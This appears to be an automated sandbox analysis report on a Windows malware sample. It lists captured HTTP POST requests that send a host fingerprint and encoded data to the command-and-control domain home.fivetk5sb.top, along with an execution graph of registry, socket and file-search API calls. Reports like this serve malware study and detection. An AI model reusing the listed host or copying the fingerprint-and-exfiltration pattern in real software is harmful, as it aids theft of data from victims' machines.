                                                  TimestampBytes transferredDirectionData
                                                  Dec 23, 2024 06:54:59.263566971 CET12360OUTPOST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1
                                                  Host: home.fivetk5sb.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 442597
                                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 36 37 33 32 33 33 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163626732336", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                                  Dec 23, 2024 06:54:59.383268118 CET2472OUTData Raw: 58 5c 2f 65 5a 52 73 63 4e 58 36 6a 68 4d 5a 68 4d 66 51 70 34 72 41 34 72 44 34 7a 44 56 56 65 6c 69 63 4a 57 70 34 69 68 55 57 31 36 64 61 6a 4b 64 4f 61 76 70 65 4d 6d 66 6b 32 4e 77 4f 4f 79 33 45 31 4d 48 6d 4f 44 78 57 41 78 6c 46 70 56 73
                                                  Data Ascii: X\/eZRscNX6jhMZhMfQp4rA4rD4zDVVelicJWp4ihUW16dajKdOavpeMmfk2NwOOy3E1MHmODxWAxlFpVsLjcPWwuJpNq6VShXhTqwbTulKKdtRr\/AHT+H8xUNWtrMM8\/U\/8A1zUb\/dP4fzFdBykNFS7T\/eP+fxp9AEWw+3+fwo2H2\/z+FfrHpv8AwSl+Ieqafo2pWvxBtbm11vTNM1O2msvBt9dwRJqdpFdRQ3Eq66gt
                                                  Dec 23, 2024 06:54:59.383292913 CET2472OUTData Raw: 43 65 39 51 70 30 5c 2f 37 5a 44 2b 62 56 61 66 72 2b 48 39 54 55 62 66 36 76 5a 73 5c 2f 44 6e 5c 2f 41 44 78 2b 76 38 67 36 43 48 4a 39 5c 2f 77 44 76 7a 5c 2f 38 41 58 71 47 54 5c 2f 62 5c 2f 65 44 6e 41 71 7a 74 5c 2f 6a 5c 2f 48 70 2b 4f 4d
                                                  Data Ascii: Ce9Qp0\/7ZD+bVafr+H9TUbf6vZs\/Dn\/ADx+v8g6CHJ9\/wDvz\/8AXqGT\/b\/eDnAqzt\/j\/Hp+OM0zy+nz7P8AJ7DFBX\/Ln\/t0qSN5m\/5w\/wC9\/wCWQNR7nZdmf8\/X\/P50\/wDv\/J8mevm+vf8An\/Omf3H2Z\/e+b36f4f4UHXDb5\/oiHy9u\/wCR9vm\/8tB+H160z5\/lf\/XOf9b\/AJ\/z2qXnO\/8A
                                                  Dec 23, 2024 06:54:59.383354902 CET2472OUTData Raw: 50 49 2b 6e 72 69 6e 74 47 37 37 45 66 37 5c 2f 6d 5c 2f 75 72 6e 5c 2f 55 66 35 39 38 5c 2f 77 44 31 36 69 62 37 7a 6f 37 5c 2f 41 50 62 54 38 4b 41 49 46 6a 50 38 42 4f 38 52 6b 2b 5a 4a 5c 2f 77 43 32 6c 70 5c 2f 54 38 73 63 30 63 66 38 41 54
                                                  Data Ascii: PI+nrintG77Ef7\/m\/urn\/Uf598\/wD16ib7zo7\/APbT8KAIFjP8BO8Rk+ZJ\/wC2lp\/T8sc0cf8ATP8A6a\/88P8Ar6u\/w6fzxU0ccjNt\/ds8fpnoKhj+aT+\/5faT15\/p71n7Pz\/D\/gmlPr8v1GfPHGkaPGP3tz+8\/wCe34+vr9MUZ\/jR5IXl\/e+Z\/qIBn+ffintJ8zJ9+OP91\/quO\/8ApWfSnyRuuzYn8
                                                  Dec 23, 2024 06:54:59.383415937 CET2472OUTData Raw: 33 6a 2b 78 4a 5c 2f 77 57 6b 5c 2f 34 59 34 2b 46 50 69 44 34 59 5c 2f 38 4d 32 66 38 4c 47 5c 2f 74 33 34 68 61 72 34 37 5c 2f 41 4c 62 5c 2f 41 4f 46 78 66 38 49 68 39 6c 5c 2f 74 50 77 35 34 54 38 50 5c 2f 41 4e 6c 66 32 62 5c 2f 77 71 76 78
                                                  Data Ascii: 3j+xJ\/wWk\/4Y4+FPiD4Y\/8M2f8LG\/t34har47\/ALb\/AOFxf8Ih9l\/tPw54T8P\/ANlf2b\/wqvxR5\/kf8Iv9r+3fb4fN+3fZ\/scf2bzrj83PjooHhLTiM\/8AIx2n\/ps1evt7\/gk\/pXwP\/aEvfjH+wr8Yfhn4DvvEf7QPgvxLqXwM+Nlx4D8Pap8Rvhf8TfC\/hu51h4LHxk+lv4p0\/wAM3el6GuvGwttZt9M
                                                  Dec 23, 2024 06:54:59.383567095 CET2472OUTData Raw: 34 2b 5c 2f 31 36 64 42 5c 2f 6e 32 35 70 64 33 5c 2f 4c 50 74 5c 2f 38 41 57 2b 6c 57 66 4c 35 33 5c 2f 77 44 36 2b 76 58 36 5a 37 65 76 74 56 57 53 50 35 66 39 5a 39 65 63 5c 2f 77 43 66 38 69 67 30 70 39 66 6c 2b 6f 65 5a 5c 2f 77 44 62 65 33
                                                  Data Ascii: 4+\/16dB\/n25pd3\/LPt\/8AW+lWfL53\/wD6+vX6Z7evtVWSP5f9Z9ec\/wCf8ig0p9fl+oeZ\/wDbe3U\/j\/Lp+NQyN5nXP+s\/z6+9DdF\/65f0FM+dvb9P\/r0Ggsm7O7Zs\/wC2WP8APrVXD43fxfTvjr69fbPepZO3+s7\/ANKbIr8p15\/1n+f06\/zoOvnfl\/XzK\/Od+z\/tnj9x\/wDq\/wA5zUHyfP8A6zv9P
                                                  Dec 23, 2024 06:54:59.383580923 CET2472OUTData Raw: 2b 66 6a 72 36 5c 2f 6a 5c 2f 2b 75 6a 32 76 6e 4c 2b 76 6d 41 7a 61 6b 63 6d 39 50 6e 48 2b 74 6c 5c 2f 36 62 66 70 5c 2f 58 48 66 72 53 37 76 33 62 68 50 4d 33 78 78 66 77 52 66 58 5c 2f 50 38 41 58 6d 6e 52 5c 2f 77 42 7a 66 47 6e 6d 52 66 36
                                                  Data Ascii: +fjr6\/j\/+uj2vnL+vmAzakcm9PnH+tl\/6bfp\/XHfrS7v3bhPM3xxfwRfX\/P8AXmnR\/wBzfGnmRf6z\/lhD3\/z\/ADFM8z95v3yfn3\/n17VR0EMkflbHTKJ\/6Jx9fT6cUPIjfOiRI8f7r\/W\/uJv6fXmn7vmjdF\/5ZXHHlH\/DNM2v8nl\/88vN\/wCeE\/5\/\/X6UAM8vzJEf7\/73\/j4jPr0uvz\/p0pnzwxw
                                                  Dec 23, 2024 06:54:59.383605957 CET2472OUTData Raw: 5c 2f 73 7a 57 6e 68 72 56 72 67 53 2b 65 73 2b 70 65 47 5c 2f 68 70 6f 76 68 36 37 6d 6a 6c 41 48 6d 4a 4c 4a 70 65 38 50 38 41 38 74 43 78 6b 5c 2f 69 77 50 61 50 43 66 67 50 53 50 67 74 2b 7a 76 34 4d 2b 46 66 39 74 4a 72 4f 6d 66 43 54 77 33
                                                  Data Ascii: \/szWnhrVrgS+es+peG\/hpovh67mjlAHmJLJpe8P8A8tCxk\/iwPaPCfgPSPgt+zv4M+Ff9tJrOmfCTw38LPAY1\/U7eDTjep4Pt\/Bul2erXdu009tY3FwlrbX5jS4lS2mkURzM0YauX\/a\/vrS\/\/AGO\/2ip7O5huoR8JvFSma3kWaIlvDkUw2yoWjcGKWN9yMy4Yc5BA\/ojIMxoy40yPA5ZTrywOJ8V8Pmf16rzxljM
                                                  Dec 23, 2024 06:54:59.383634090 CET2472OUTData Raw: 65 74 50 5a 2b 66 34 66 38 41 42 4e 71 64 54 35 5c 2f 72 5c 2f 77 41 48 5c 2f 67 36 42 55 66 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 70 4b 6a 48 5c 2f 4c 54 38 66 36 31 6d 64 48 76 5c 2f 41 4e 33 38 53 47 52 63 66 68 5c 2f 49 5c 2f 77 43 66 35 31 44
                                                  Data Ascii: etPZ+f4f8ABNqdT5\/r\/wAH\/g6BUfl+\/wCn\/wBepKjH\/LT8f61mdHv\/AN38SGRcfh\/I\/wCf51DVioX+8fw\/kKDXnfl\/XzK7Ltx3zTasVE\/X8P6mg1GVBJH8vXP4f569KnooOgpSR\/Lxx9e\/+en0\/VlTP90\/h\/MVDQdBDyx\/zxTP40+pqWTt+P8ASo6Dsp9fkQ\/M3qf5f4ZqNo09wnT\/ADn\/AD0q1Ucn
                                                  Dec 23, 2024 06:54:59.383688927 CET2472OUTData Raw: 41 56 66 36 37 5c 2f 50 36 35 39 2b 51 36 42 6b 6d 5c 2f 35 4e 6a 78 76 2b 39 5c 2f 35 36 5c 2f 6c 2b 48 54 70 54 50 75 73 6e 38 66 2b 78 4a 2b 58 61 6e 74 73 65 4f 62 66 35 69 65 5a 5c 2f 77 42 73 4d 66 35 5c 2f 2b 76 6b 55 2b 50 38 41 65 65 71
                                                  Data Ascii: AVf67\/P659+Q6Bkm\/5Njxv+9\/56\/l+HTpTPusn8f+xJ+XantseObf5ieZ\/wBsMf5\/+vkU+P8AeeqP\/wAso5Isf5\/H3oApyf3k+vlfmcfy6fl3qTzEEn+p8maf97n\/AF3HX\/RMZ\/zx6U7dtkTZNG6fn\/jn+mKhWQx+czpJ+8\/59\/8An3Hf\/wDV2rT2nl+P\/AAbJjy9++R383\/VyS\/uOnP\/ANcev6ofL8z
                                                  Dec 23, 2024 06:54:59.383763075 CET2472OUTData Raw: 69 4b 37 30 50 78 44 62 32 66 69 6e 77 44 42 34 38 30 52 72 7a 77 37 71 31 67 4c 73 36 67 4c 43 31 76 5c 2f 4b 66 43 2b 73 61 58 34 73 6c 2b 46 43 61 66 34 69 38 46 5c 2f 59 66 6a 44 38 4c 74 59 2b 4d 76 68 72 78 46 4c 72 47 75 78 2b 46 39 4d 2b
                                                  Data Ascii: iK70PxDb2finwDB480Rrzw7q1gLs6gLC1v\/KfC+saX4sl+FCaf4i8F\/YfjD8LtY+MvhrxFLrGux+F9M+HvhPUPiPYeP9f8SanP4SgvbS3+HX\/CpvHt34wfSNK1yK0stBuJtMl1YvCkn5Xg\/G\/wjx8HUwvHuR1IRo1cRJzqV6HLQo5VPPZ1ZKvRpNQlktOWb0W0vrGWuGNw\/tcPVpVJ\/tGM+jn445fFzxXhpxLCCr5fhn
                                                  Dec 23, 2024 06:55:01.577084064 CET309INHTTP/1.1 502 Bad Gateway
                                                  Server: nginx/1.22.1
                                                  Date: Mon, 23 Dec 2024 05:55:01 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 157
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.1049726185.121.15.192807820C:\Users\user\Desktop\Yda6AxtlVP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 23, 2024 06:55:02.927181959 CET350OUTPOST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1
                                                  Host: home.fivetk5sb.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 209
                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                  Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
                                                  Dec 23, 2024 06:55:04.951663017 CET372INHTTP/1.1 404 NOT FOUND
                                                  Server: nginx/1.22.1
                                                  Date: Mon, 23 Dec 2024 05:55:04 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 207
                                                  Connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.104970534.226.108.1554437820C:\Users\user\Desktop\Yda6AxtlVP.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-23 05:54:56 UTC52OUTGET /ip HTTP/1.1
                                                  Host: httpbin.org
                                                  Accept: */*
                                                  2024-12-23 05:54:57 UTC224INHTTP/1.1 200 OK
                                                  Date: Mon, 23 Dec 2024 05:54:57 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Connection: close
                                                  Server: gunicorn/19.9.0
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Credentials: true
                                                  2024-12-23 05:54:57 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                  Data Ascii: { "origin": "8.46.123.189"}


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:00:54:51
                                                  Start date:23/12/2024
                                                  Path:C:\Users\user\Desktop\Yda6AxtlVP.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Yda6AxtlVP.exe"
                                                  Imagebase:0xd50000
                                                  File size:4'534'272 bytes
                                                  MD5 hash:339948CF14BFED6A4E1CD717BEEB9FFF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:18.9%
                                                    Total number of Nodes:264
                                                    Total number of Limit Nodes:45
                                                    execution_graph 67415 e04720 67419 e04728 67415->67419 67416 e04733 67418 e04774 67419->67416 67426 e0476c 67419->67426 67431 e05540 closesocket 67419->67431 67421 e0482e 67421->67426 67432 e09270 67421->67432 67423 e04860 67437 e04950 67423->67437 67425 e04878 67426->67425 67427 e030a0 67426->67427 67428 e030b0 67427->67428 67430 e031bc 67427->67430 67428->67430 67445 e03320 67428->67445 67430->67418 67431->67421 67450 e0a440 67432->67450 67434 e09297 67436 e092ab 67434->67436 67480 e0bbe0 closesocket 67434->67480 67436->67423 67438 e04966 67437->67438 67442 e049c5 67438->67442 67444 e049b9 67438->67444 67482 e0b590 if_indextoname 67438->67482 67440 e04a3e 67440->67442 67483 e0bbe0 closesocket 67440->67483 67441 e04aa0 gethostname 67441->67442 67441->67444 67442->67426 67444->67441 67444->67442 67448 e03332 67445->67448 67446 e033a9 67446->67430 67448->67446 67449 e19440 closesocket 67448->67449 67449->67448 67478 e0a46b 67450->67478 67451 e0a4db 67452 e0aa03 RegOpenKeyExA 67451->67452 67465 e0ad14 67451->67465 67453 e0ab70 RegOpenKeyExA 67452->67453 67454 e0aa27 RegQueryValueExA 67452->67454 67457 e0ac34 RegOpenKeyExA 67453->67457 67475 e0ab90 67453->67475 67455 e0aa71 67454->67455 67456 e0aacc RegQueryValueExA 67454->67456 67455->67456 67463 e0aa85 RegQueryValueExA 67455->67463 67459 e0ab66 RegCloseKey 67456->67459 67460 e0ab0e 67456->67460 67458 e0acf8 RegOpenKeyExA 67457->67458 67477 e0ac54 67457->67477 67461 e0ad56 RegEnumKeyExA 67458->67461 67458->67465 67459->67453 67460->67459 67464 e0ab1e RegQueryValueExA 67460->67464 67462 e0ad9b 67461->67462 67461->67465 67466 e0ae16 RegOpenKeyExA 67462->67466 67467 e0aab3 67463->67467 67468 e0ab4c 67464->67468 67465->67434 67469 e0ae34 RegQueryValueExA 67466->67469 67470 e0addf RegEnumKeyExA 67466->67470 67467->67456 67468->67459 67471 e0af43 RegQueryValueExA 67469->67471 67479 e0adaa 67469->67479 67470->67465 67470->67466 67472 e0b052 RegQueryValueExA 67471->67472 67471->67479 67474 e0adc7 RegCloseKey 67472->67474 67472->67479 67474->67470 67475->67457 67476 e0afa0 RegQueryValueExA 67476->67479 67477->67458 67478->67451 67481 e0b830 if_indextoname 67478->67481 67479->67471 67479->67472 67479->67474 67479->67476 67480->67436 67481->67451 67482->67440 67483->67444 67630 e03c00 67631 e03c23 67630->67631 67632 e03c0d 67630->67632 67631->67632 67634 e1b180 67631->67634 67637 e1b2e3 67634->67637 67638 e1b19b 67634->67638 67637->67632 67637->67637 67638->67637 67639 e1b2a9 getsockname 67638->67639 67641 e1b020 closesocket 67638->67641 67642 e1af30 67638->67642 67646 e1b060 67638->67646 67651 e1b020 67639->67651 67641->67638 67643 e1af63 socket 67642->67643 67644 e1af4c 67642->67644 67643->67638 67644->67643 67645 e1af52 67644->67645 67645->67638 67648 e1b080 67646->67648 67647 e1b0b0 connect 67649 e1b0bf WSAGetLastError 67647->67649 67648->67647 67648->67649 67650 e1b0ea 67648->67650 67649->67648 67649->67650 67650->67638 67652 e1b052 67651->67652 67653 e1b029 67651->67653 67652->67638 67654 e1b04b closesocket 67653->67654 67655 e1b03e 67653->67655 67654->67652 67655->67638 67656 e1a080 67659 e19740 67656->67659 67658 e1a09b 67660 e19780 67659->67660 67664 e1975d 67659->67664 67661 e19925 RegOpenKeyExA 67660->67661 67660->67664 67662 e1995a RegQueryValueExA 67661->67662 67661->67664 67663 e19986 RegCloseKey 67662->67663 67663->67664 67664->67658 67484 d531d7 67487 d531f4 67484->67487 67485 d53200 67486 d532dc CloseHandle 67486->67485 67487->67485 67487->67486 67488 d52f17 67495 d52f2c 67488->67495 67489 d531d3 67490 d52fb3 RegOpenKeyExA 67490->67495 67491 d5315c RegEnumKeyExA 67491->67495 67492 d53046 RegOpenKeyExA 67493 d53089 RegQueryValueExA 67492->67493 67492->67495 67494 d5313b RegCloseKey 67493->67494 67493->67495 67494->67495 67495->67489 67495->67490 67495->67491 67495->67492 67495->67494 67496 d88b50 67497 d88b6b 67496->67497 67515 d88bb5 67496->67515 67498 d88b8f 67497->67498 67499 d88bf3 67497->67499 67497->67515 67535 d66e40 select 67498->67535 67516 d8a550 67499->67516 67502 d88ba1 67504 d88cd9 SleepEx 67502->67504 67509 d88cb2 67502->67509 67502->67515 67503 d88bfc 67505 d88c1f connect 67503->67505 67506 d88c35 67503->67506 67503->67509 67503->67515 67512 d88d13 67504->67512 67505->67506 67531 d8a150 67506->67531 67507 d8a150 getsockname 67508 d88dff 67507->67508 67508->67515 67536 d578b0 closesocket 67508->67536 67509->67507 67509->67508 67509->67515 67512->67509 67513 d88d43 67512->67513 67514 d8a150 getsockname 67513->67514 67514->67515 67517 d8a575 67516->67517 67519 d8a597 67517->67519 67538 d575e0 67517->67538 67522 d8a811 setsockopt 67519->67522 67527 d8a83b 67519->67527 67529 d8a69b 67519->67529 67520 d578b0 closesocket 67521 d8a713 67520->67521 67521->67503 67522->67527 67524 d8af56 67525 d8af5d 67524->67525 67524->67529 67525->67521 67526 d8a150 getsockname 67525->67526 67526->67521 67527->67529 67530 d8abe1 67527->67530 67544 d86be0 select closesocket 67527->67544 67529->67520 67529->67521 67530->67529 67543 db67e0 ioctlsocket 67530->67543 67532 d8a15f 67531->67532 67534 d8a1d0 67531->67534 67533 d8a181 getsockname 67532->67533 67532->67534 67533->67534 67534->67502 67535->67502 67537 d578c5 67536->67537 67537->67515 67539 d57607 socket 67538->67539 67540 d575ef 67538->67540 67541 d5762b 67539->67541 67540->67539 67542 d57643 67540->67542 67541->67519 67542->67519 67543->67524 67544->67530 67545 d5255d 67546 10d9f70 67545->67546 67547 d5256c GetSystemInfo 67546->67547 67548 d52589 67547->67548 67549 d525a0 GlobalMemoryStatusEx 67548->67549 67554 d525ec 67549->67554 67550 d5263c GetDriveTypeA 67552 d52655 GetDiskFreeSpaceExA 67550->67552 67550->67554 67551 d52762 67553 d527d6 KiUserCallbackDispatcher 67551->67553 67552->67554 67555 d527f8 67553->67555 67554->67550 67554->67551 67556 d528d9 FindFirstFileW 67555->67556 67557 d52906 FindNextFileW 67556->67557 67558 d52928 67556->67558 67557->67557 67557->67558 67665 d895b0 67666 d895c8 67665->67666 67668 d895fd 67665->67668 67667 d8a150 getsockname 67666->67667 67666->67668 67667->67668 67669 d529ff FindFirstFileA 67670 d52a31 67669->67670 67671 d52a5c RegOpenKeyExA 67670->67671 67672 d52a93 67671->67672 67673 d52ade CharUpperA 67672->67673 67674 d52b0a 67673->67674 67675 d52bf9 QueryFullProcessImageNameA 67674->67675 67676 d52c3b CloseHandle 67675->67676 67678 d52c64 67676->67678 67677 d52df1 CloseHandle 67679 d52e23 67677->67679 67678->67677 67559 d53d5e 67560 d53d30 67559->67560 67560->67559 67562 d53d90 67560->67562 67563 d60ab0 67560->67563 67566 d605b0 67563->67566 67565 d60acd 67565->67560 67569 d605bd 67566->67569 67572 d607c7 67566->67572 67567 d60707 WSAEventSelect 67567->67569 67567->67572 67568 d607ef 67568->67572 67574 d60847 67568->67574 67576 d66fa0 67568->67576 67569->67567 67569->67568 67569->67572 67580 d576a0 67569->67580 67572->67565 67573 d609e8 WSAEnumNetworkEvents 67573->67574 67575 d609d0 WSAEventSelect 67573->67575 67574->67572 67574->67573 67574->67575 67575->67573 67575->67574 67578 d66fd4 67576->67578 67579 d66feb 67576->67579 67577 d67207 select 67577->67579 67578->67577 67578->67579 67579->67574 67581 d576e6 send 67580->67581 67582 d576c0 67580->67582 67583 d576c9 67581->67583 67582->67581 67582->67583 67583->67569 67584 10db180 Sleep 67680 e05a50 67681 e05a58 67680->67681 67686 e05ea0 67680->67686 67682 e05a99 67681->67682 67683 e05b50 67681->67683 67689 e05b88 67681->67689 67682->67689 67695 e070a0 6 API calls 67682->67695 67708 e06f10 socket ioctlsocket connect getsockname closesocket 67682->67708 67687 e05eb4 67683->67687 67688 e05b7a 67683->67688 67683->67689 67684 e05e96 67710 e19480 closesocket 67684->67710 67711 e06f10 socket ioctlsocket connect getsockname closesocket 67687->67711 67701 e070a0 67688->67701 67689->67684 67697 e1a920 67689->67697 67709 e19320 closesocket 67689->67709 67692 e05ec2 67692->67692 67695->67682 67698 e1a944 67697->67698 67699 e1a977 send 67698->67699 67700 e1a94b 67698->67700 67699->67689 67700->67689 67706 e070ae 67701->67706 67703 e071a7 67703->67689 67704 e0717f 67704->67703 67717 e19320 closesocket 67704->67717 67706->67703 67706->67704 67712 e1a8c0 67706->67712 67716 e071c0 socket ioctlsocket connect getsockname 67706->67716 67708->67682 67709->67689 67710->67686 67711->67692 67713 e1a903 recvfrom 67712->67713 67714 e1a8e6 67712->67714 67715 e1a8ed 67713->67715 67714->67713 67714->67715 67715->67706 67716->67706 67717->67703 67585 1233c70 67586 1233c9a 67585->67586 67587 1233ca6 67586->67587 67590 10e12c0 67586->67590 67589 1233cda 67591 10e12cc 67590->67591 67594 10de050 67591->67594 67593 10e12fa 67593->67589 67597 10de09d 67594->67597 67595 10dfeb6 isxdigit 67595->67597 67596 10de18e 67596->67593 67597->67595 67597->67596 67718 d6d5e0 67719 d6d652 WSAStartup 67718->67719 67720 d6d5f0 67718->67720 67719->67720 67598 d8b3c0 67599 d8b3cb 67598->67599 67600 d8b3ee 67598->67600 67602 d576a0 send 67599->67602 67604 d89290 67599->67604 67601 d8b3ea 67602->67601 67605 d576a0 send 67604->67605 67606 d892e5 67605->67606 67607 d89335 WSAIoctl 67606->67607 67608 d89392 67606->67608 67607->67608 67609 d89366 67607->67609 67608->67601 67609->67608 67610 d89371 setsockopt 67609->67610 67610->67608 67611 d8e400 67612 d8e412 67611->67612 67613 d8e459 67611->67613 67615 d868b0 closesocket 67612->67615 67615->67613 67616 d8b400 67617 d8b40b 67616->67617 67618 d8b425 67616->67618 67621 d57770 67617->67621 67619 d8b421 67622 d577b6 recv 67621->67622 67623 d57790 67621->67623 67624 d57799 67622->67624 67623->67622 67623->67624 67624->67619 67625 d513c9 67627 d51160 67625->67627 67628 d513a1 67627->67628 67629 10d8a20 isxdigit 67627->67629 67629->67627

                                                    Executed Functions

                                                    Function 00D8F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
